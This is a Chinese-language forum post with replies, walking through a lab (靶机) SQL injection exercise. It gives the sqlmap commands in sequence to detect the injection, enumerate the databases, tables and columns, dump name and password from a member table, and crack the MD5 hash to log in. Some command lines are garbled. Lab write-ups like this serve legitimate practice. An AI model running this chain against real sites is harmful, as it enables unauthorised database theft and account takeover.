首页 > 编程源码 > 实战利用sqlmap渗透

实战利用sqlmap渗透

楼主:污界小公举 [1级] · 2020-4-2 ·  浏览1173 · 编程源码 · ID:

IP地址自行寻找IP地址自行寻找使用工具:sqlmap

直接sqlmap -u http://IP地址自行寻找:42300/new_list.php?id=tingjigonggao

检测注入点之后

sqlmap -u sqlmap -u sqlmap -u http://IP地址自行寻找:42300/new_list.php?id=tingjigonggao --dbs

查找数据库发现mozhe_discuz_stormgroup数据库即为我们需要的sqlmap -u http://:42300/new_list.php?id=tingjigonggao -D mozhe_discuz_stormgroup --tables

猜测表名查找到stormgroup_member的表,想必用户信息就在其中sqlmap -u http://:42300/new_list.php?id=tingjigonggao -D mozhe_discuz_stormgroup -T stormgroup_member --columns

查找字段列名可以很清楚地看到存在name以及password的字段列故sqlmap -u http://IP地址自行寻找:42300/new_list.php?id=tingjigonggao -D mozhe_discuz_stormgroup -T stormgroup_member -C name,password --dump

查看字段随机看到name为mozhepassword为一串MD5加密代码,解密后即为密码使用name和password登录即可

最后说一句这个是找的靶机,别傻乎乎去瞎找网站扫描

- 版权声明 - 1、本帖所有言论和图片等纯属网友个人意见,与流星社区立场无关;
2、其他单位或个人使用、转载或引用本帖时必须同时征得该帖子作者污界小公举流星社区的同意;
3、备注原文地址:https://bbs.liuxingw.com/t/26479.html,可忽略第2条;
4、帖子作者需承担一切因本文发表而直接或间接导致的相关责任;
5、如本帖内容或部分内容转载自其它媒体,这并不代表本站赞同其观点和对其真实性负责;
6、如本帖若为资源类,将仅限用于学习和研究目的,您必须在下载后的24个小时之内,从您安装或使用的设备中彻底删除上述内容;
7、如果您喜欢该程序,请支持正版软件,购买注册,可以得到更好的正版服务;
8、如本帖侵犯到任何版权或违法问题,请立即邮件告知我们,我们将及时予以处理。
13条回复 |  最后回复于2020-4-2

污界小公举 [1级]

看不到可以问嗷
发布于2020-4-2

回复列表

  • 内容加载中...

说点什么...

幻鹤若飞 [1级]

手机还是电脑
发布于2020-4-2

回复列表

  • 内容加载中...

说点什么...

[]

加一,,满脸问号
发布于2020-4-2

回复列表

  • 内容加载中...

说点什么...

昵称734821 [1级]

这个怎么玩
发布于2020-4-2

回复列表

  • 内容加载中...

说点什么...

污界小公举 [1级]

kali。。。
发布于2020-4-2

回复列表

  • 内容加载中...

说点什么...

污界小公举 [1级]

电脑的kali
发布于2020-4-2

回复列表

  • 内容加载中...

说点什么...

污界小公举 [1级]

安装kali系统手机好像用temux啥的可以安装
发布于2020-4-2

回复列表

  • 内容加载中...

说点什么...

树下>缩衣客 [1级]

Linux系统才能安装Windows貌似不能
发布于2020-4-2

回复列表

  • 内容加载中...

说点什么...

下个路口再见 [1级]

有没有关于黑客的软件分享一下
发布于2020-4-2

回复列表

  • 内容加载中...

说点什么...

君莫坑 [1级]

Windows可以克隆
发布于2020-4-2

回复列表

  • 内容加载中...

说点什么...
登录注册 后才可进行评论
签到
5人签到
已签0天
  • 46595帖子
  • 1936427热点量
  • 184804火热值